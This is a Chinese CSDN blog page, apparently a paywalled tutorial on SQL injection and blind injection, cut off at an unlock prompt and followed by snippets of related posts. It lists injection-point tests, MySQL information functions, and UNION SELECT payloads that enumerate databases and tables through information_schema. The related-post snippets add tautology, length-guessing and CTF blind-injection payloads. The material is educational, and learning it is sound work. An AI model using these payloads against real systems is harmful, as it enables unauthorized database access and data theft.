简单的sql注入语法+盲注。

最新推荐文章于 2024-08-01 16:42:22 发布
最新推荐文章于 2024-08-01 16:42:22 发布
阅读量700 收藏 2
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haha13l4/article/details/89603841
版权
本文详细介绍了SQL注入的基本概念,包括如何判断注入点、获取数据库信息的方法,如数据库名、用户名、版本等。通过`ORDER BY`确定字段数,并展示了不同情况下的注入绕过策略,如处理整数、字符型数据以及加密注入。最后,文章讨论了SQL盲注技术。
摘要由CSDN通过智能技术生成

数据库注入语法

一.判断是否有注入点

简单如:
and 1=1
and 1=2

二.要搜寻的一些基本信息

数据库名 database()
用户名 user()
数据库版本信息 version()
版本大于5.0,自身带有数据库信息。可以查询用户,表名,列名
操作系统 @@version_compile_os
mysql安装路径 @@basedir
数据库路径 @@datadir
table_name 表名
column_name 列名
table_schema 数据库名
information_schema.tables 记录表名信息的表
information_schema.columns 记录列名信息的表

三.order by 1,2,3 确定字段数

  1. union select database(),user(),version(),@@version_complie_os
    得到:数据库名 用户名 版本 系统信息
  2. union select schema_name,2 from infeomation_schema.schemata
    得到:mysql数据库下的所有数据库名
  3. union select table_name,2 from information_schema.tables where table_schema=’数据库名’
    得到:该数据库下面的所有表名
    union select table_name,table_schema from information_schem
最低0.47元/天 解锁文章
haha13l4
关注
专栏目录
【网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 8589
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
sqlserver数据库布尔盲注_SQL注入实战之盲注篇(布尔、时间盲注
weixin_32179749的博客
01-14 1006
首先还是写一下核心的语句吧。information_schemaschemata(schema_name)tables(table_schema,table_name)columns(table_schema,table_name,column_name)select schema_name from information_schema.schemata;select table_name fr...
SQL黑客注入防御与绕过的多种姿势
sinat_38899493的博客
12-22 2418
一、 PHP几种防御姿势 1. 关闭错误提示 说明: PHP配置文件php.ini中的display_errors=Off,这样就关闭了错误提示。 2. 魔术引号 说明: 当php.ini里的magic_quotes_gpc=On时。提交的变量中所有的单引号(')、双引号(")、反斜线()与 NUL(NULL 字符)会自动转为含有反斜线的转义字符。 魔术引号(Magic Quote)
SQL注入盲注
胖虎的博客
11-15 1850
sql注入之布尔类型的盲注,结合burpsuite工具实现半自动化
SQL注入中常用的mysql语法
孤的博客
10-29 910
user()返回当前数据库连接使用的用户; database()返回当前数据库连接使用的数据库; version()返回当前数据库的版本; concat-ws() 函数可以将这些函数进行组合使用并显示出来。concat函数中,将其中的参数直接连接起来产生新的字符串。而在concat_ws函数中,第一个参数是用于作为分隔符将后面各个参数的内容分隔开来再进行相应的连接产生新的字符串。 concat_w...
简单SQL注入2
雨九九的小窝
10-25 759
地址:http://ctf5.shiyanbar.com/web/index_2.php 参考资料:http://www.bubuko.com/infodetail-2301250.html 1.直接输入单引号,根据报错信息确定参数值类型为字符型 2.输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1, 仍然报错,信...
SQL注入自学[第一学:一个简单的注入环境的编写]
aiquan9342的博客
11-04 201
/* 转载请注明出处 ID:珍惜少年时 */ CODE区域: /*注:现在mysql_connect的这种连接方式已经被放弃了,也就是说不用了,老夫也是新手上路故,下载了一个wampserver2.2的低版本的环境来测试,当然了可以使用“@”符号,当然了用mysqli自然也是可以的。代码有待优化。新手上路嘛。嘻嘻。 */ <?php $localhost="l...
SQL注入--报错和盲注
qq_57307348的博客
02-10 1938
回顾之前的文章(sql注入基础),了解到sql注入的分类有 基于正常回显 联合查询 union select 基于错误回显 floor() extractvalue()   updatexml() 盲注 布尔型盲注 基于时间盲注sleep() 报错注入的前提 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点: 不需要显示位 缺点: 需要输出mysql_error()的...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入基础知识点 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造...
sql注入盲注基础
m0_73248913的博客
02-03 265
盲注其实就是我们执行sql注入的时候,选择的数据不会回显到前端(说白了前端看不到),但是也是服务器查询了,所以我们这里需要利用别的方式来进行判断或者尝试。
记一次简单SQL注入
he320631127的博客
08-06 569
参考:http://103.238.227.13:10083/ bugku 可以看到编码是gb2312 测试注入点 id=1和id=1‘ 都没错 应该是宽字节注入,在试试 id=%df’ 报错 接着来 输入字段id=%df’ union select 1,2 %23 查看数据库的名 查看要找的key表里面的string ...
实验吧-简单sql注入2 Writeup
baynk的博客
07-28 297
抓紧时间来搞,事情越来越多。。。 过程 输入1'后有报错,单引号闭合,尝试了--+和%23均无法注释,又试过了构造闭合,发现and和or也都用不了。加上这次只要被检测出来就直接就有提示界面,并不像上一个那样有信息可看,感觉挺麻烦的。 于是判断到底是如何被检测的,然后试过了双写,大小写啥的,都不行,于是我直接把所有的空格都去掉了,写成了1'and1='1,这次总算有提示了。 从上面就能看出来,如果...
SQL注入入门
qq_32941821的博客
12-12 163
SQL注入 原理:以简单的get方法举例 #在进行页面请求的时候,页面和数据库打交道,会向数据库里面传入sql语句,示例如下 页面输入为 1 源码为: $query = SELECT first_name, lastname FROM users WHERE user_id = $1 实际传入 SELECT first_name, last_name FROM users WHERE use...
最最简单的SQL手工注入教学,我奶奶都会
MachineGunJoe666
04-24 1911
这期教学是给小白学习的,大佬看看就好。 我们先打开靶场:【靶场】 我们先进去发现是一个很简单的页端。 我们先判断是否有注入。 我们先在链接后面添加: and 1=1 来判断是否有注入。 发现返回正常。 我们再在链接末尾输入:and 1=2 这里我们发现与之前and 1=1时的界面不一样了这就说明有注入。 (这里解释一下and 1=1是什么意思 其实很简单就是你问一个服务器1是不是=1 所以我们and 1=1 返回正常 and1=2就是问1是不是=2所以我们报错了)
SQL注入——搜索型注入
最新发布
YJ_12340的博客
08-01 1055
一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在;其中又分为 POST/GET ,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的 method="get" 属性来区分是get还是post。搜索型注入又称为文本框注入。
史上最详细的SQL盲注入门教程
weixin_44867191的博客
05-16 1410
正常情况下,用户输入用户名id,就能查到用户信息,但是如果攻击者输入的内容是:666' or '1'='1,那么查询的SQL语句就变成SELECT name,age FROM users WHERE user_id = '666' or '1'='1',由于1=1恒成立,就会执行SQL,执行后,就会返回所有的学生信息,有回显信息,这就是典型的。如果执行SQL后,应用程序不显示任何具体的数据,可能只是告诉我们查询成功或者查询失败,或者什么都不说,没有回显,但是SQL还是执行了,SQL注入发生了,这就是。
sql盲注语法
09-11 116
如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容 获取数据长度: and (select top 1 len(列名) from 表名)>5 and (select top 1 len(password) from admin)>16//错误 and (select top 1 len(password) from admin)>15//正常 ...
盲注攻击实例:识别与利用SQL注入
首先,作者定义了SQL注入的概念,它是指攻击者通过恶意构造SQL查询语句,利用应用程序未恰当过滤用户输入,使数据库系统执行非预期的命令。 SQL注入的危害主要体现在能够窃取敏感数据、修改数据库结构或执行非法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值